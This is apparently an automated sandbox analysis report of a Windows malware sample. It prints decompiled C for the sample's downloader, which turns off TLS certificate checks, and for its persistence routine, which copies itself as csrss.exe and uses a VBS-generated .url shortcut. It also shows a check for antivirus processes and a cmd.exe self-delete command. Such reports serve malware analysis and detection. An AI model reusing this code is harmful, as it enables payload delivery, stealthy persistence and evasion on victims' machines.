				_t126 = HttpOpenRequestA(_v20, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0);
				_v16 = _t126;
				if(_t126 == 0) {
					L26:
					InternetCloseHandle(_v20);
					InternetCloseHandle(_v8);
					return 0;
				} else {
					/* substring search for "https://" in the URL selects the TLS branch (L25 path) */
					_t71 = E035D18D0(_t118, "https://");
					_t139 = _t138 + 8;
					if(_t71 == 0) {
						L10:
						if(HttpSendRequestA(_t126, 0, 0, 0, 0) == 0) {
							goto L25;
						} else {
							/* allocate a 0x400-byte buffer and grow it as the response is read */
							_t119 = 0x400;
							_t128 = E035D15E0(0x400);
							_t140 = _t139 + 4;
							if(_t128 == 0) {
								_t126 = _v16;
								goto L25;
							} else {
								do {
									if(InternetReadFile(_v16, _t128 + _t108, _t119,  &_v24) == 0) {
										/* 0x7a = ERROR_INSUFFICIENT_BUFFER: grow by 0x400 and retry */
										if(GetLastError() != 0x7a) {
											E035D1510(_t128);
											L23:
											InternetCloseHandle(_v16);
											InternetCloseHandle(_v20);
											InternetCloseHandle(_v8);
											return 0;
										} else {
											_t119 = _t119 + 0x400;
											goto L17;
										}
									} else {
										_t87 = _v24;
										if(_t87 == 0) {
											/* zero bytes read: end of body. The payload is terminated by ";End";
											   the terminator is overwritten with NUL and the buffer returned. */
											InternetCloseHandle(_v16);
											InternetCloseHandle(_v20);
											_t111 = _v8;
											InternetCloseHandle(_t111);
											_t91 = E035D18D0(_t128, ";End");
											if(_t91 != 0) {
												 *_t91 = 0;
												return _t128;
											} else {
												E035D1510(_t128);
												InternetCloseHandle(_v16);
												InternetCloseHandle(_v20);
												InternetCloseHandle(_t111);
												return 0;
											}
										} else {
											_t108 = _t108 + _t87;
											goto L17;
										}
									}
									goto L27;
									L17:
									_t128 = E035D16A0(_t128, _t119 + _t108);
									_t140 = _t140 + 8;
								} while (_t128 != 0);
								goto L23;
							}
						}
					} else {
						/* 0x1f = INTERNET_OPTION_SECURITY_FLAGS; OR-ing in 0x180
						   (SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_REVOCATION)
						   disables CA and revocation checks on the TLS connection */
						_v12 = 0;
						_v28 = 4;
						if(InternetQueryOptionA(_t126, 0x1f,  &_v12,  &_v28) == 0) {
							L25:
							InternetCloseHandle(_t126);
							goto L26;
						} else {
							_v12 = _v12 | 0x00000180;
							if(InternetSetOptionA(_t126, 0x1f,  &_v12, 4) == 0) {
								goto L25;
							} else {
								goto L10;
							}
						}
					}
				}
			} else {
				E035D1510();
				InternetCloseHandle(_v8);
				return 0;
			}
		} else {
			E035D1510(_t123);
			return 0;
		}
	} else {
		return _t55;
	}
	L27:
}

                                                                                                                                          APIs
                                                                                                                                          • InternetCrackUrlA.WININET(74B5EA30,00000000,?,?,00000000,00000000), ref: 035D4B57
                                                                                                                                          • InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 035D4B9D
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Internet$CrackOpen
                                                                                                                                          • String ID: ;End$<$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
                                                                                                                                          • API String ID: 1262293563-2187584305
                                                                                                                                          • Opcode ID: 2a2ff3b97c69296246d7ce3c0724e73ff4e5efdf8073d6574e0077453a923539
                                                                                                                                          • Instruction ID: 6df4c5e6eed5d288d59e0cb944001800a2c8268714f18503078067121f0d76c9
                                                                                                                                          • Opcode Fuzzy Hash: 2a2ff3b97c69296246d7ce3c0724e73ff4e5efdf8073d6574e0077453a923539
                                                                                                                                          • Instruction Fuzzy Hash: C781E571E012096BDB30FBE9FC45FAEB7B8FF44350F140165F904E62A0EB355A158AA0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                          			E035D7C30(void* __ecx, void* __edx, void* __eflags, char* _a4, intOrPtr* _a8) {
                                                                                                                                          				void _v8;
                                                                                                                                          				void* _v12;
                                                                                                                                          				void* _v16;
                                                                                                                                          				void* _v20;
                                                                                                                                          				long _v24;
                                                                                                                                          				long _v28;
                                                                                                                                          				long _v32;
                                                                                                                                          				char* _v36;
                                                                                                                                          				char* _v40;
                                                                                                                                          				char* _v44;
                                                                                                                                          				char* _v48;
                                                                                                                                          				char* _v52;
                                                                                                                                          				intOrPtr _v56;
                                                                                                                                          				intOrPtr _v64;
                                                                                                                                          				char* _v68;
                                                                                                                                          				short _v88;
                                                                                                                                          				intOrPtr _v92;
                                                                                                                                          				intOrPtr _v96;
                                                                                                                                          				intOrPtr _v104;
                                                                                                                                          				char _v108;
                                                                                                                                          				void* _v112;
                                                                                                                                          				long _t53;
                                                                                                                                          				int _t54;
                                                                                                                                          				void* _t62;
                                                                                                                                          				void* _t63;
                                                                                                                                          				void* _t72;
                                                                                                                                          				long _t88;
                                                                                                                                          				long _t103;
                                                                                                                                          				char* _t108;
                                                                                                                                          				intOrPtr _t109;
                                                                                                                                          				char* _t111;
                                                                                                                                          				void* _t114;
                                                                                                                                          				long _t116;
                                                                                                                                          				void* _t123;
                                                                                                                                          				void* _t125;
                                                                                                                                          				void* _t126;
                                                                                                                                          				void* _t127;
                                                                                                                                          				void* _t128;
                                                                                                                                          				void* _t129;
                                                                                                                                          
                                                                                                                                          				E035D1BB0( &_v108, 0, 0x38);
                                                                                                                                          				_t108 = _a4;
                                                                                                                                          				_v24 = 0;
                                                                                                                                          				_t103 = 0;
                                                                                                                                          				_v112 = 0x3c;
                                                                                                                                          				_v92 = 0xffffffff;
                                                                                                                                          				_v104 = 0xffffffff;
                                                                                                                                          				_v64 = 0xffffffff;
                                                                                                                                          				_v56 = 0xffffffff;
                                                                                                                                          				_t53 = E035D1850(_t108);
                                                                                                                                          				_t125 = _t123 + 0x10;
                                                                                                                                          				_t54 = InternetCrackUrlA(_t108, _t53, 0,  &_v112);
                                                                                                                                          				if(_t54 != 0) {
                                                                                                                                          					_t111 = E035D15E0(_v92 + 1);
                                                                                                                                          					E035D1BB0(_t111, 0, _v92 + 1);
                                                                                                                                          					E035D1640(_t111, _v96, _v92);
                                                                                                                                          					_t126 = _t125 + 0x1c;
                                                                                                                                          					_t62 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0);
                                                                                                                                          					_v20 = _t62;
                                                                                                                                          					if(_t62 != 0) {
                                                                                                                                          						_t63 = InternetConnectA(_t62, _t111, _v88, 0, 0, 3, 0, 0);
                                                                                                                                          						_v16 = _t63;
                                                                                                                                          						_push(_t111);
                                                                                                                                          						if(_t63 != 0) {
                                                                                                                                          							E035D1510();
                                                                                                                                          							E035D18D0(_t108, "https://");
                                                                                                                                          							_t127 = _t126 + 0xc;
                                                                                                                                          							_v52 = "text/*";
                                                                                                                                          							_v48 = "application/exe";
                                                                                                                                          							_v44 = "application/zlib";
                                                                                                                                          							_t113 =  !=  ? 0x84ecf300 : 0x846cf300;
                                                                                                                                          							_v40 = "application/gzip";
                                                                                                                                          							_v36 = "application/applefile";
                                                                                                                                          							_v32 = 0;
                                                                                                                                          							_t114 = HttpOpenRequestA(_v16, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0);
                                                                                                                                          							_v12 = _t114;
                                                                                                                                          							if(_t114 == 0) {
                                                                                                                                          								L24:
                                                                                                                                          								InternetCloseHandle(_v16);
                                                                                                                                          								InternetCloseHandle(_v20);
                                                                                                                                          								return 0;
                                                                                                                                          							} else {
                                                                                                                                          								_t72 = E035D18D0(_t108, "https://");
                                                                                                                                          								_t128 = _t127 + 8;
                                                                                                                                          								if(_t72 == 0) {
                                                                                                                                          									L10:
                                                                                                                                          									if(HttpSendRequestA(_t114, 0, 0, 0, 0) == 0) {
                                                                                                                                          										goto L23;
                                                                                                                                          									} else {
                                                                                                                                          										_t116 = 0x400;
                                                                                                                                          										_t109 = E035D15E0(0x400);
                                                                                                                                          										_t129 = _t128 + 4;
                                                                                                                                          										if(_t109 == 0) {
                                                                                                                                          											_t114 = _v12;
                                                                                                                                          											goto L23;
                                                                                                                                          										} else {
                                                                                                                                          											do {
                                                                                                                                          												if(InternetReadFile(_v12, _t109 + _t103, _t116,  &_v24) == 0) {
                                                                                                                                          													if(GetLastError() != 0x7a) {
                                                                                                                                          														E035D1510(_t109);
                                                                                                                                          														L21:
                                                                                                                                          														InternetCloseHandle(_v12);
                                                                                                                                          														InternetCloseHandle(_v16);
                                                                                                                                          														InternetCloseHandle(_v20);
                                                                                                                                          														return 0;
                                                                                                                                          													} else {
                                                                                                                                          														_t116 = _t116 + 0x400;
                                                                                                                                          														goto L15;
                                                                                                                                          													}
                                                                                                                                          												} else {
                                                                                                                                          													_t88 = _v24;
                                                                                                                                          													if(_t88 == 0) {
                                                                                                                                          														InternetCloseHandle(_v12);
                                                                                                                                          														InternetCloseHandle(_v16);
                                                                                                                                          														InternetCloseHandle(_v20);
                                                                                                                                          														 *_a8 = _t109;
                                                                                                                                          														return _t103;
                                                                                                                                          													} else {
                                                                                                                                          														_t103 = _t103 + _t88;
                                                                                                                                          														goto L15;
                                                                                                                                          													}
                                                                                                                                          												}
                                                                                                                                          												goto L25;
                                                                                                                                          												L15:
                                                                                                                                          												_t109 = E035D16A0(_t109, _t116 + _t103);
                                                                                                                                          												_t129 = _t129 + 8;
                                                                                                                                          											} while (_t109 != 0);
                                                                                                                                          											goto L21;
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          								} else {
                                                                                                                                          									_v8 = 0;
                                                                                                                                          									_v28 = 4;
                                                                                                                                          									if(InternetQueryOptionA(_t114, 0x1f,  &_v8,  &_v28) == 0) {
                                                                                                                                          										L23:
                                                                                                                                          										InternetCloseHandle(_t114);
                                                                                                                                          										goto L24;
                                                                                                                                          									} else {
                                                                                                                                          										_v8 = _v8 | 0x00000180;
                                                                                                                                          										if(InternetSetOptionA(_t114, 0x1f,  &_v8, 4) == 0) {
                                                                                                                                          											goto L23;
                                                                                                                                          										} else {
                                                                                                                                          											goto L10;
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						} else {
                                                                                                                                          							E035D1510();
                                                                                                                                          							InternetCloseHandle(_v20);
                                                                                                                                          							return 0;
                                                                                                                                          						}
                                                                                                                                          					} else {
                                                                                                                                          						E035D1510(_t111);
                                                                                                                                          						return 0;
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					return _t54;
                                                                                                                                          				}
                                                                                                                                          				L25:
                                                                                                                                          			}











































                                                                                                                                          APIs
                                                                                                                                          • InternetCrackUrlA.WININET(00000044,00000000,?,?,?,00000000), ref: 035D7C87
                                                                                                                                          • InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 035D7CCD
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Internet$CrackOpen
                                                                                                                                          • String ID: <$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
                                                                                                                                          • API String ID: 1262293563-3953569400
                                                                                                                                          • Opcode ID: c57e2fddc15b5eac46c33750d6c97caab138a03bf5855748f49433301d0f5a53
                                                                                                                                          • Instruction ID: 1a0f500e05378df4dbe09f3368b3d58887da47bee2abe4602e2615ca61715b51
                                                                                                                                          • Opcode Fuzzy Hash: c57e2fddc15b5eac46c33750d6c97caab138a03bf5855748f49433301d0f5a53
                                                                                                                                          • Instruction Fuzzy Hash: B371C371E01219ABDB31EFE8FC45FAEBBB8FF44760F140165F904E62A0E7315A158A90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E035D65D0(void* __eflags) {
                                                                                                                                          				short _v524;
                                                                                                                                          				short _v1044;
                                                                                                                                          				short _v1564;
                                                                                                                                          				char _v2588;
                                                                                                                                          				char _v3612;
                                                                                                                                          				char _v4636;
                                                                                                                                          				void* _t61;
                                                                                                                                          				void* _t69;
                                                                                                                                          				void* _t71;
                                                                                                                                          				void* _t73;
                                                                                                                                          				void* _t100;
                                                                                                                                          				void* _t102;
                                                                                                                                          				void* _t103;
                                                                                                                                          				void* _t105;
                                                                                                                                          				void* _t128;
                                                                                                                                          				void* _t134;
                                                                                                                                          				void* _t141;
                                                                                                                                          				void* _t142;
                                                                                                                                          				void* _t143;
                                                                                                                                          				void* _t144;
                                                                                                                                          				void* _t145;
                                                                                                                                          				void* _t146;
                                                                                                                                          				void* _t150;
                                                                                                                                          
                                                                                                                                          				E035D1A00( &_v524, "C:\ProgramData\LKBNMTFJgl");
                                                                                                                                          				E035D1970( &_v524, "\\");
                                                                                                                                          				E035D1970( &_v524, "csrss.exe");
                                                                                                                                          				 *((short*)(_t141 + E035D1B40( &_v524) * 2 - 0x210)) = 0;
                                                                                                                                          				E035D1A00( &_v1044, "C:\ProgramData\LKBNMTFJgl");
                                                                                                                                          				E035D1970( &_v1044, L"\\r.vbs");
                                                                                                                                          				_t61 = E035D7FA0(0,  &_v3612,  &E035DAAD0, 7);
                                                                                                                                          				_t143 = _t142 + 0x38;
                                                                                                                                          				if(_t61 != 0) {
                                                                                                                                          					E035D1970( &_v3612, "\\");
                                                                                                                                          					E035D1970( &_v3612, "viTRMUuKeV");
                                                                                                                                          					E035D1970( &_v3612, L".url");
                                                                                                                                          					_t69 = E035D6340( &_v524);
                                                                                                                                          					_t144 = _t143 + 0x1c;
                                                                                                                                          					__eflags = _t69;
                                                                                                                                          					if(_t69 == 0) {
                                                                                                                                          						goto L1;
                                                                                                                                          					} else {
                                                                                                                                          						_t71 = E035D7EF0("a2guard.exe");
                                                                                                                                          						_t145 = _t144 + 4;
                                                                                                                                          						__eflags = _t71;
                                                                                                                                          						if(_t71 != 0) {
                                                                                                                                          							L10:
                                                                                                                                          							_t73 = E035D7ED0( &_v3612);
                                                                                                                                          							_t146 = _t145 + 4;
                                                                                                                                          							__eflags = _t73;
                                                                                                                                          							if(_t73 != 0) {
                                                                                                                                          								goto L13;
                                                                                                                                          							} else {
                                                                                                                                          								E035D1A00( &_v4636, L"[InternetShortcut]\r\nURL=\"file:///");
                                                                                                                                          								E035D1970( &_v4636,  &_v524);
                                                                                                                                          								E035D1970( &_v4636, L".exe\"");
                                                                                                                                          								_t100 = E035D7AF0( &_v3612,  &_v4636);
                                                                                                                                          								_t146 = _t146 + 0x20;
                                                                                                                                          								__eflags = _t100;
                                                                                                                                          								if(_t100 != 0) {
                                                                                                                                          									goto L13;
                                                                                                                                          								} else {
                                                                                                                                          									goto L12;
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						} else {
                                                                                                                                          							_t102 = E035D7EF0("a2service.exe");
                                                                                                                                          							_t145 = _t145 + 4;
                                                                                                                                          							__eflags = _t102;
                                                                                                                                          							if(_t102 != 0) {
                                                                                                                                          								goto L10;
                                                                                                                                          							} else {
                                                                                                                                          								_t103 = E035D7EF0("a2start.exe");
                                                                                                                                          								_t145 = _t145 + 4;
                                                                                                                                          								__eflags = _t103;
                                                                                                                                          								if(_t103 != 0) {
                                                                                                                                          									goto L10;
                                                                                                                                          								} else {
                                                                                                                                          									_t105 = E035D7ED0( &_v3612);
                                                                                                                                          									_t146 = _t145 + 4;
                                                                                                                                          									__eflags = _t105;
                                                                                                                                          									if(_t105 != 0) {
                                                                                                                                          										L13:
                                                                                                                                          										E035D6990( &_v3612);
                                                                                                                                          										E035D1A00( &_v1564,  &_v524);
                                                                                                                                          										E035D1970( &_v1564, L".exe");
                                                                                                                                          										DeleteFileW( &_v1564);
                                                                                                                                          										MoveFileW( &_v524,  &_v1564);
                                                                                                                                          										E035D68E0( &_v1564);
                                                                                                                                          										DeleteFileW( &_v524);
                                                                                                                                          										return 1;
                                                                                                                                          									} else {
                                                                                                                                          										E035D1A00( &_v2588, L"Set objFSO=CreateObject(\"Scripting.FileSystemObject\")\r\n");
                                                                                                                                          										E035D1970( &_v2588, L"outFile=\"");
                                                                                                                                          										E035D1970( &_v2588,  &_v3612);
                                                                                                                                          										E035D1970( &_v2588, L"\"\r\n");
                                                                                                                                          										E035D1970( &_v2588, L"Set objFile = objFSO.CreateTextFile(outFile,True)\r\n");
                                                                                                                                          										E035D1970( &_v2588, L"objFile.Write \"[InternetShortcut]\" & vbCrLf & \"URL=\"\"file:///");
                                                                                                                                          										E035D1970( &_v2588,  &_v524);
                                                                                                                                          										E035D1970( &_v2588, L".exe\"\"\"\r\n");
                                                                                                                                          										E035D1970( &_v2588, L"objFile.Close\r\n");
                                                                                                                                          										_t128 = E035D7AF0( &_v1044,  &_v2588);
                                                                                                                                          										_t150 = _t146 + 0x50;
                                                                                                                                          										__eflags = _t128;
                                                                                                                                          										if(__eflags == 0) {
                                                                                                                                          											L12:
                                                                                                                                          											__eflags = 0;
                                                                                                                                          											return 0;
                                                                                                                                          										} else {
                                                                                                                                          											E035D6A40(0, __eflags,  &_v1044);
                                                                                                                                          											Sleep(0xbb8);
                                                                                                                                          											DeleteFileW( &_v1044);
                                                                                                                                          											_t134 = E035D7ED0( &_v3612);
                                                                                                                                          											_t146 = _t150 + 8;
                                                                                                                                          											__eflags = _t134;
                                                                                                                                          											if(_t134 != 0) {
                                                                                                                                          												goto L13;
                                                                                                                                          											} else {
                                                                                                                                          												return _t134;
                                                                                                                                          											}
                                                                                                                                          										}
                                                                                                                                          									}
                                                                                                                                          								}
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					}
                                                                                                                                          				} else {
                                                                                                                                          					L1:
                                                                                                                                          					return 0;
                                                                                                                                          				}
                                                                                                                                          			}

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 035D7FA0: LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D7FAA
                                                                                                                                            • Part of subcall function 035D7FA0: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D7FBC
                                                                                                                                            • Part of subcall function 035D7FA0: CoTaskMemFree.OLE32(00000000,035DAAE0), ref: 035D7FEF
                                                                                                                                            • Part of subcall function 035D7FA0: FreeLibrary.KERNEL32(00000000,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D7FF6
                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 035D67D9
                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 035D67E6
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeLibrary$AddressDeleteFileLoadProcSleepTask
                                                                                                                                          • String ID: "$.exe$.exe"$.exe"""$.url$C:\ProgramData\LKBNMTFJgl$Set objFSO=CreateObject("Scripting.FileSystemObject")$Set objFile = objFSO.CreateTextFile(outFile,True)$[InternetShortcut]URL="file:///$\r.vbs$a2guard.exe$a2service.exe$a2start.exe$csrss.exe$objFile.Close$objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///$outFile="$viTRMUuKeV
                                                                                                                                          • API String ID: 976351581-227138989
                                                                                                                                          • Opcode ID: 71977068a476b7a7a0dd7b371ad08ae325babea5ddb0d86a34f112fc8a015f95
                                                                                                                                          • Instruction ID: 83e78410b41fad1c0fd16bc5c56e09bcb0092878d716f9d3834e280873871ff3
                                                                                                                                          • Opcode Fuzzy Hash: 71977068a476b7a7a0dd7b371ad08ae325babea5ddb0d86a34f112fc8a015f95
                                                                                                                                          • Instruction Fuzzy Hash: C8612CB6D0031D6ADFB0E7E8EC45ECB72BCBF44144F4805E1A51AE6021EA74E795CBA1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                          			E035D76A0(short __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
                                                                                                                                          				char _v8;
                                                                                                                                          				struct _PROCESS_INFORMATION _v24;
                                                                                                                                          				struct _STARTUPINFOW _v92;
                                                                                                                                          				short _v1116;
                                                                                                                                          				char _v1636;
                                                                                                                                          				short _v4196;
                                                                                                                                          				void* _t53;
                                                                                                                                          				WCHAR* _t54;
                                                                                                                                          				WCHAR* _t56;
                                                                                                                                          				WCHAR* _t58;
                                                                                                                                          				WCHAR* _t59;
                                                                                                                                          				WCHAR* _t60;
                                                                                                                                          				signed int _t62;
                                                                                                                                          				WCHAR* _t66;
                                                                                                                                          				WCHAR* _t81;
                                                                                                                                          				WCHAR* _t82;
                                                                                                                                          				void* _t87;
                                                                                                                                          				void* _t88;
                                                                                                                                          				WCHAR* _t103;
                                                                                                                                          				WCHAR* _t107;
                                                                                                                                          				WCHAR* _t110;
                                                                                                                                          				int _t115;
                                                                                                                                          				signed int _t120;
                                                                                                                                          				WCHAR* _t121;
                                                                                                                                          				WCHAR* _t122;
                                                                                                                                          				void* _t140;
                                                                                                                                          				intOrPtr* _t141;
                                                                                                                                          				WCHAR* _t143;
                                                                                                                                          				void* _t146;
                                                                                                                                          				void* _t147;
                                                                                                                                          				void* _t148;
                                                                                                                                          				void* _t149;
                                                                                                                                          				void* _t151;
                                                                                                                                          				void* _t152;
                                                                                                                                          				void* _t153;
                                                                                                                                          				void* _t155;
                                                                                                                                          
                                                                                                                                          				_t130 = __ecx;
                                                                                                                                          				_t148 = _t147 - 0x1060;
                                                                                                                                          				if( *0x37a2e00 >= 0xc350) {
                                                                                                                                          					L39:
                                                                                                                                          					__eflags = 0;
                                                                                                                                          					return 0;
                                                                                                                                          				} else {
                                                                                                                                          					_t157 =  *0x37a1c4c;
                                                                                                                                          					if( *0x37a1c4c == 0) {
                                                                                                                                          						goto L39;
                                                                                                                                          					} else {
                                                                                                                                          						E035D1BB0( &_v92, 0, 0x44);
                                                                                                                                          						asm("xorps xmm0, xmm0");
                                                                                                                                          						asm("movups [ebp-0x14], xmm0");
                                                                                                                                          						_t53 = E035D7C30(_t130, __edx, _t157, _a4,  &_v8);
                                                                                                                                          						_t135 = _t53;
                                                                                                                                          						_t149 = _t148 + 0x14;
                                                                                                                                          						if(_t53 != 0) {
                                                                                                                                          							_t141 = __imp__GetLongPathNameW;
                                                                                                                                          							_t54 =  *_t141("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", 0x200, _t140);
                                                                                                                                          							__eflags = _t54;
                                                                                                                                          							if(_t54 == 0) {
                                                                                                                                          								L37:
                                                                                                                                          								_push(_v8);
                                                                                                                                          								goto L38;
                                                                                                                                          							} else {
                                                                                                                                          								__eflags = _t54 - 0x200;
                                                                                                                                          								if(_t54 > 0x200) {
                                                                                                                                          									goto L37;
                                                                                                                                          								} else {
                                                                                                                                          									_t56 = E035D1A30("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", "C:\ProgramData\LKBNMTFJgl");
                                                                                                                                          									_t149 = _t149 + 8;
                                                                                                                                          									__eflags = _t56;
                                                                                                                                          									if(_t56 != 0) {
                                                                                                                                          										L10:
                                                                                                                                          										_t58 = GetTempPathW(0x200,  &_v1116);
                                                                                                                                          										__eflags = _t58;
                                                                                                                                          										if(_t58 == 0) {
                                                                                                                                          											goto L37;
                                                                                                                                          										} else {
                                                                                                                                          											__eflags = _t58 - 0x200;
                                                                                                                                          											if(_t58 > 0x200) {
                                                                                                                                          												goto L37;
                                                                                                                                          											} else {
                                                                                                                                          												_t59 =  &_v1116;
                                                                                                                                          												_t60 =  *_t141(_t59, _t59, 0x200);
                                                                                                                                          												__eflags = _t60;
                                                                                                                                          												if(_t60 == 0) {
                                                                                                                                          													goto L37;
                                                                                                                                          												} else {
                                                                                                                                          													__eflags = _t60 - 0x200;
                                                                                                                                          													if(_t60 > 0x200) {
                                                                                                                                          														goto L37;
                                                                                                                                          													} else {
                                                                                                                                          														_t62 = E035D1B40( &_v1116);
                                                                                                                                          														_t151 = _t149 + 4;
                                                                                                                                          														__eflags =  *((short*)(_t146 + _t62 * 2 - 0x45a)) - 0x5c;
                                                                                                                                          														if( *((short*)(_t146 + _t62 * 2 - 0x45a)) != 0x5c) {
                                                                                                                                          															 *((short*)(_t146 + E035D1B40( &_v1116) * 2 - 0x458)) = 0x5c;
                                                                                                                                          															_t120 = E035D1B40( &_v1116);
                                                                                                                                          															_t151 = _t151 + 8;
                                                                                                                                          															_t130 = 0;
                                                                                                                                          															__eflags = 0;
                                                                                                                                          															 *((short*)(_t146 + _t120 * 2 - 0x456)) = 0;
                                                                                                                                          														}
                                                                                                                                          														E035D1970( &_v1116, "csrss.exe");
                                                                                                                                          														_t152 = _t151 + 8;
                                                                                                                                          														goto L17;
                                                                                                                                          													}
                                                                                                                                          												}
                                                                                                                                          											}
                                                                                                                                          										}
                                                                                                                                          									} else {
                                                                                                                                          										_t121 = E035D1A30("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", L"ProgramData");
                                                                                                                                          										_t149 = _t149 + 8;
                                                                                                                                          										__eflags = _t121;
                                                                                                                                          										if(_t121 != 0) {
                                                                                                                                          											goto L10;
                                                                                                                                          										} else {
                                                                                                                                          											_t122 = E035D1A30("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", 0x37a204c);
                                                                                                                                          											_t149 = _t149 + 8;
                                                                                                                                          											__eflags = _t122;
                                                                                                                                          											if(_t122 != 0) {
                                                                                                                                          												goto L10;
                                                                                                                                          											} else {
                                                                                                                                          												E035D1A00( &_v1116, "C:\ProgramData\LKBNMTFJgl");
                                                                                                                                          												E035D1970( &_v1116, "\\");
                                                                                                                                          												E035D1970( &_v1116, "csrss.exe");
                                                                                                                                          												_t152 = _t149 + 0x18;
                                                                                                                                          												E035D6D50();
                                                                                                                                          												L17:
                                                                                                                                          												_t66 = E035D87C0( &_v1116, _v8, _t135);
                                                                                                                                          												_t149 = _t152 + 0xc;
                                                                                                                                          												_push(_v8);
                                                                                                                                          												__eflags = _t66;
                                                                                                                                          												if(_t66 == 0) {
                                                                                                                                          													L38:
                                                                                                                                          													E035D1510();
                                                                                                                                          													 *0x37a2e00 =  &(( *0x37a2e00)[0]);
                                                                                                                                          													__eflags =  *0x37a2e00;
                                                                                                                                          													goto L39;
                                                                                                                                          												} else {
                                                                                                                                          													E035D1510();
                                                                                                                                          													_t143 = E035D15E0(0x24);
                                                                                                                                          													_t153 = _t149 + 8;
                                                                                                                                          													__eflags = _t143;
                                                                                                                                          													if(_t143 != 0) {
                                                                                                                                          														_t81 = E035D8B20( &_v1116, _t143);
                                                                                                                                          														_t155 = _t153 + 8;
                                                                                                                                          														__eflags = _t81;
                                                                                                                                          														if(_t81 != 0) {
                                                                                                                                          															_t143[0x10] = 0;
                                                                                                                                          															_t82 = E035D1740(_t143, _a16);
                                                                                                                                          															_t155 = _t155 + 8;
                                                                                                                                          															_push(_t143);
                                                                                                                                          															__eflags = _t82;
                                                                                                                                          															if(_t82 != 0) {
                                                                                                                                          																goto L21;
                                                                                                                                          															} else {
                                                                                                                                          																E035D1510();
                                                                                                                                          																_t153 = _t155 + 4;
                                                                                                                                          																__eflags =  *0x37a1300;
                                                                                                                                          																if( *0x37a1300 == 0) {
                                                                                                                                          																	L29:
                                                                                                                                          																	__eflags = _a12;
                                                                                                                                          																	if(_a12 != 0) {
                                                                                                                                          																		E035D8730(_a8);
                                                                                                                                          																		_t153 = _t153 + 4;
                                                                                                                                          																	}
                                                                                                                                          																	 *0x37a2118 = 1;
                                                                                                                                          																	_t87 =  *0x37a211c;
                                                                                                                                          																	__eflags = _t87;
                                                                                                                                          																	if(_t87 == 0) {
                                                                                                                                          																		L33:
                                                                                                                                          																		_t88 =  *0x37a2120;
                                                                                                                                          																		__eflags = _t88;
                                                                                                                                          																		if(_t88 != 0) {
                                                                                                                                          																			TerminateThread(_t88, 0);
                                                                                                                                          																		}
                                                                                                                                          																		E035D1A00( &_v4196, L"cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q \"");
                                                                                                                                          																		E035D1970( &_v4196, "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe");
                                                                                                                                          																		E035D1970( &_v4196, L"\" & \"");
                                                                                                                                          																		E035D1970( &_v4196,  &_v1116);
                                                                                                                                          																		E035D1970( &_v4196, "\"");
                                                                                                                                          																		_t153 = _t153 + 0x28;
																		_t103 = CreateProcessW(0,  &_v4196, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
																		__eflags = _t103;
																		if(_t103 != 0) {
																			CloseHandle(_v24.hThread);
																			CloseHandle(_v24);
																			ExitProcess(0);
																		}
																	} else {
																		_t107 = WaitForSingleObject(_t87, 0xea60);
																		__eflags = _t107;
																		if(_t107 == 0) {
																			goto L33;
																		}
																	}
																} else {
																	_t143 = E035D15E0(0x400);
																	_t153 = _t153 + 4;
																	__eflags = _t143;
																	if(_t143 != 0) {
